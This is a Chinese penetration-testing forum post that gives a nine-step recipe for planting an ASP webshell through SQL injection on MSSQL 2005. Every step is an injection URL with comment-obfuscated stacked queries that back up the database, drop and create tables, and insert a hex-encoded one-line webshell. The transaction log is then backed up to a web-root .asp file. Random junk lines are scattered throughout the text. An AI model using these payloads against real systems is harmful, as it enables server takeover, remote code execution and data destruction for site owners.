中国网络渗透测试联盟
标题:
Mssql2005 Log备份Webshell
[打印本页]
作者:
admin
时间:
2012-9-15 14:25
标题:
Mssql2005 Log备份Webshell
第一步
. I9 H5 W8 O6 ^ Q* f! G
http://itpro.blog.163.com/test.asp';alter/
**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
0 p8 r" ~4 i r
+ p) j3 v6 X1 \
第二步:
' @, F1 b: [ ?- d2 u! Y
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
/ v& O0 z' z4 R, F& H
4 h, x% J, s9 ?& Z/ p: G* Z
第三步
7 q3 @0 ~. K) A4 [" i6 C
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
- E" E* ]# \8 y7 Y+ Q+ C0 r0 Y
8 k% T, e0 k7 q3 {" u
第四步
6 @/ j+ e( X( m h, p9 R+ O
http://itpro.blog.163.com/test.asp';create/
**/table/**/[itpro]([a]/**/image)--
: u$ r$ E! B K6 X
4 C; b" R* u% ~* \1 z
第五步
! \) `! ?3 ^. {+ o
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
2 ]# G2 w) f$ F& Y, {
$ t* S# n% A. u% |- B5 {+ [
第六步
; o; ]3 W! o5 e
http://itpro.blog.163.com/test.asp';insert/
**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
4 y1 r2 @: `- J; ^* r
: C p6 W& N/ _# V
第七步
$ \" J" S( u8 H3 t! b
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
2 }1 D& \3 t0 q* x! D
+ ~( `8 j q( p7 `# e
第八步
, s' `' G( O1 K! Q& J: N
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
1 M1 X- `" u- }3 U# m4 e$ Z
o& s+ Q) Q/ k+ P! Y
第九步
, U, A6 @& _; l8 j0 s- m, K6 `0 w7 W
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
l/ x( I N9 T& d' f; i
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2